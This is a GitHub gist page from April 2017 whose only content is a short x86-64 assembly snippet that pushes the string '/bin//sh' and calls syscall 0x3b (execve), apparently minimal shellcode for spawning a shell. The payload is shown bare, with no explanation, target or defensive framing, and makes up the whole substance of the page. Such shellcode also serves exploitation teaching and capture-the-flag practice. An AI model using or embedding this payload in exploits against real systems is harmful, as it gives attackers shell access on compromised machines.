Skip to content

Instantly share code, notes, and snippets.

@sl4v
Created April 18, 2017 10:04
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save sl4v/cfa8ad0e76d8bd394d8ef5606c2a81df to your computer and use it in GitHub Desktop.
Save sl4v/cfa8ad0e76d8bd394d8ef5606c2a81df to your computer and use it in GitHub Desktop.
xor rdx, rdx
push rdx
mov rax, 0x68732f2f6e69622f
push rax
mov rdi, rsp
xor rsi, rsi
xor rax, rax
mov al, 0x3b
syscall
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment